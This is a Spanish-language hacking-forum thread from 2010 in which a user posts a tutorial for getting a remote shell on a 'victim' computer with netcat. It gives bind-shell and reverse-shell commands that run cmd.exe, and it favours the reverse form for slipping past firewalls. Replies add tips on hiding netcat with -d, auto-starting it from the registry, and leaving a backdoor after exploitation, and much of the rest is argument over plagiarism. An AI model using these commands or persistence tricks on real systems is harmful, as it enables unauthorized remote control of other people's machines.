Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Pyr0s en 10 Enero 2010, 15:25 pm



Título: Conseguir Shell con Netcat
Publicado por: Pyr0s en 10 Enero 2010, 15:25 pm
Conseguir Shell en Netcat

Autor: Pyr0s
Foro: Evolution

Hay dos maneras de conseguir shell por conexión directa o inversa, mostraré las dos pero os aconsejo que useis la inversa ya que os saltais unos cuantos firewalls  

Conexión Directa

En este tipo de conexión tú te conectas a la victima, el funcionamiento sería el siguiente:


Citar
nc -l -p 123 -e cmd.exe

-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto
-e: Permite ejecutar un comando, en nuestro caso cmd.exe (Shell)


Ese sería el comando que tendría que ejecutar la víctima


Citar
Telnet 192.168.1.33 123

Y ahi es donde nosotros nos tendríamos que conectar, entonces ya tendriamos Shell  

Inversa


Citar
nc -v -l -p 123

-v: Informa del estado de Netcat
-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto


Esos serían los comandos que tenemos que teclear, mientras que nuestra víctima tiene que ejcutar los siguientes comandos


Citar
nc 192.168.1.33 123 -e cmd.exe

Con lo que la Shell la consigue el usuario que esta en escucha en este caso nosotros, y asi tenemos shell y evitamos que no salte el firewall de nuestra victima  

Esto es todo, espero que os haya gustado el tutorial    :P

Saludos!


Título: Re: Conseguir Shell con Netcat
Publicado por: n3w en 10 Enero 2010, 16:31 pm
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?


Título: Re: Conseguir Shell con Netcat
Publicado por: Pyr0s en 10 Enero 2010, 16:38 pm
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?

DIOS! que dices loco pero si lo hice yo sin copiar nada aver vamos por puntos:

  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador? EDITO: Con la pública u.u
  • No digas que lo he copiado sin tener ni idea  ;), ¿la pregunta que era a pillar?

Saludos!


Título: Re: Conseguir Shell con Netcat
Publicado por: Shell Root en 10 Enero 2010, 16:53 pm
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P


  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P

creo que en la inversa se puede hacer un No-IP también pero preferí poner la IP
Re-WTF! No-IP!


Título: Re: Conseguir Shell con Netcat
Publicado por: Pyr0s en 10 Enero 2010, 16:57 pm
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P


  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P

creo que en la inversa se puede hacer un No-IP también pero preferí poner la IP
Re-WTF! No-IP!

... esto ... gracias! xD ya modifique un poco el post, gracias la verdad es que mas salvado xD

Saludos!


Título: Re: Conseguir Shell con Netcat
Publicado por: Shell Root en 10 Enero 2010, 17:08 pm
PD: Intenta jugar con los parametros del NetCat.
Por Ejemplo:
Código:
-d Significa que desvincula a netcat del cmd y lo hace trabajar en modo oculto. 


Título: Re: Conseguir Shell con Netcat
Publicado por: fede_cp en 10 Enero 2010, 17:57 pm
claro, las conexiones ya estás mas que aprendidas (no es para tirarte abajo, vale la intension), pero el netcat tiene bastantes parametros, para hacer combinaciones y generar nuevas funciones o cosas, por eso el creador dice, el netcat sirve para 1001 vainas :P.



saludos!


Título: Re: Conseguir Shell con Netcat
Publicado por: [L]ord [R]NA en 10 Enero 2010, 18:12 pm
Hay tantos tutos en Internet de como obtener una shell con Netcat como lo penszamientos Sadomasoquistas del payaso de McDonald :xD


Título: Re: Conseguir Shell con Netcat
Publicado por: Pyr0s en 10 Enero 2010, 18:16 pm
Motivais como nadie para que la gente aporte  ;)


Título: Re: Conseguir Shell con Netcat
Publicado por: Debci en 10 Enero 2010, 20:04 pm
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.

Saludos


Título: Re: Conseguir Shell con Netcat
Publicado por: peib0l en 10 Enero 2010, 22:31 pm
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.

Saludos

si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque  ;)



Título: Re: Conseguir Shell con Netcat
Publicado por: Pyr0s en 11 Enero 2010, 01:57 am
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.

Saludos

si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque  ;)



Estas diciendo que nc no es útil a la hora de una intrusión  :silbar:


Título: Re: Conseguir Shell con Netcat
Publicado por: peib0l en 11 Enero 2010, 08:42 am
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.

Saludos

si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque  ;)



Estas diciendo que nc no es útil a la hora de una intrusión  :silbar:

estoy diciendo, que si no conoces estos comandos extremadamente basicos de nc , segurmante no reunas los conocimientos minimos para realizar una intrusion.


Título: Re: Conseguir Shell con Netcat
Publicado por: kamsky en 11 Enero 2010, 11:48 am
y yo digo que Pyr0s  se ha molestado en hacer algo para el foro, de más o menos nivel, eso es lo de menos, pero al fin y al cabo se ha molestado, si alguien no le gusta, simplemente que no lo lea, críticas no constructivas no sirven para mucho, me gustaría que todos los que las hacen se molestasen e invirtiesen su tiempo en hacer algún paper de forma que todos les podamos criticar...

si alguien tiene algún comentario que no tiene nada que ver con el contenido del post, ruego se lo guarde y no desvía el tema

gracias


Título: Re: Conseguir Shell con Netcat
Publicado por: peib0l en 11 Enero 2010, 13:01 pm
yo no e dicho que no sea mal aporte Kamsky, solo e echo una observacion a un comentario de un usuario, yo lo e leido y me a gustado que quede claro

mi comentario solo iva hacia ..::| D3Bć1 |::. 


Título: Re: Conseguir Shell con Netcat
Publicado por: Debci en 11 Enero 2010, 22:47 pm
yo no e dicho que no sea mal aporte Kamsky, solo e echo una observacion a un comentario de un usuario, yo lo e leido y me a gustado que quede claro

mi comentario solo iva hacia ..::| D3Bć1 |::. 
Enserio crees que no necesitas nc? Bueno... si es tan inutil...
Yo aprecio los aportes de los demás, y pienso que es algo util, a mi parecer, si no sabes nc o telnet no serás capaz de hacer una intrusión.
A no ser que tengas un trojan o algo que le hallas colado por ingenieria social, pero ya no hablariamos de este tipo de intrusiones.

Saludos


Título: Re: Conseguir Shell con Netcat
Publicado por: n3w en 11 Enero 2010, 22:51 pm
No estoy muy seguro , pero con nessus + metasploit , consigues una sesion de meterpreter y haciendo "shell" o "cmd" , no recuerdo el comando, ya conseguias una shell remota no?.
Pero no se donde vi yo que no recomendaban hacer eso porque la sesion que creabas con el meterpreter en el pc remoto era una conexión "débil", por eso recomendaban subir el netcat y dejarlo escuchando en el pc remoto. Lo que no entiendo es a que se refería con débil , ya que no lo explicaba, alguien sabe?


Título: Re: Conseguir Shell con Netcat
Publicado por: kamsky en 11 Enero 2010, 23:11 pm
a que si se rompe por lo que sea, tendrás que volver a explotar la vulnerabilidad para conseguir acceso, mientras que si dejas una puerta trasera siempre lo tendrás, además puedes aprovechar para tu mismo securizar el host víctima y que nadie se aproveche de la vulnerabilidad salvo tu, esto último es bastante común cuando accedes a un Server


Título: Re: Conseguir Shell con Netcat
Publicado por: n3w en 11 Enero 2010, 23:22 pm
Entiendo , gracias.


Título: Re: Conseguir Shell con Netcat
Publicado por: peib0l en 11 Enero 2010, 23:38 pm
yo no e dicho que no sea mal aporte Kamsky, solo e echo una observacion a un comentario de un usuario, yo lo e leido y me a gustado que quede claro

mi comentario solo iva hacia ..::| D3Bć1 |::. 
Enserio crees que no necesitas nc? Bueno... si es tan inutil...
Yo aprecio los aportes de los demás, y pienso que es algo util, a mi parecer, si no sabes nc o telnet no serás capaz de hacer una intrusión.
A no ser que tengas un trojan o algo que le hallas colado por ingenieria social, pero ya no hablariamos de este tipo de intrusiones.

Saludos

me cago en la... pero leete todo, que el aporte esta bien! que se agradece! pero que si quieres realizar una intrusion (usando el soft que sea) si tienes la guia al lado paso a paso es porque seguramnte no tienes ni idea de lo que haces.
y en ningun momento e dicho uqe NC sea inutil.

y para tu informacion hay muuuuuuuchas formas de realizar intrusiones, no solo esta Nc , telnet , troyanos ...  lee mas y descubriras cosas  ;)


Salu2


Título: Re: Conseguir Shell con Netcat
Publicado por: Debci en 12 Enero 2010, 18:02 pm
yo no e dicho que no sea mal aporte Kamsky, solo e echo una observacion a un comentario de un usuario, yo lo e leido y me a gustado que quede claro

mi comentario solo iva hacia ..::| D3Bć1 |::. 
Enserio crees que no necesitas nc? Bueno... si es tan inutil...
Yo aprecio los aportes de los demás, y pienso que es algo util, a mi parecer, si no sabes nc o telnet no serás capaz de hacer una intrusión.
A no ser que tengas un trojan o algo que le hallas colado por ingenieria social, pero ya no hablariamos de este tipo de intrusiones.

Saludos

me cago en la... pero leete todo, que el aporte esta bien! que se agradece! pero que si quieres realizar una intrusion (usando el soft que sea) si tienes la guia al lado paso a paso es porque seguramnte no tienes ni idea de lo que haces.
y en ningun momento e dicho uqe NC sea inutil.

y para tu informacion hay muuuuuuuchas formas de realizar intrusiones, no solo esta Nc , telnet , troyanos ...  lee mas y descubriras cosas  ;)


Salu2
Cuando se habla de nc, creo que se habla desde pentest (exploits, payloads...) y una vez dentro por ejemplo, meterle en el registro que autoinicie el nc con conexion a tu pc.

Saludos


Título: Re: Conseguir Shell con Netcat
Publicado por: peib0l en 12 Enero 2010, 19:22 pm
 :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-(

en serio no entedeis o solo quereis acabar conmigo?  :-( :-( :-( :-( :-( :-(



Título: Re: Conseguir Shell con Netcat
Publicado por: mokoMonster en 13 Enero 2010, 03:54 am
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?

//+1


Título: Re: Conseguir Shell con Netcat
Publicado por: n3w en 13 Enero 2010, 13:56 pm
Uf , yo tampoco quería que mi comentario desembocase en una discusión asi , fue una simple observación , pero ojo que yo aun no hice ningún tutorial de netcat , asi que técnicamente estas 1 paso por delante :).
Sin embargo me quiero animar a hacer uno de cryptcat , a ver si le echo ganas ,vi uno de WHK de hace bastante tiempo del cryptcat en windows y estaba muy majo :)


Título: Re: Conseguir Shell con Netcat
Publicado por: Debci en 13 Enero 2010, 18:57 pm
:-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-(

en serio no entedeis o solo quereis acabar conmigo?  :-( :-( :-( :-( :-( :-(


No tio, ya esta no quiero discutir mas, "buen royo" enserio, no quiero nada malo para nadie.  ;)

Saludos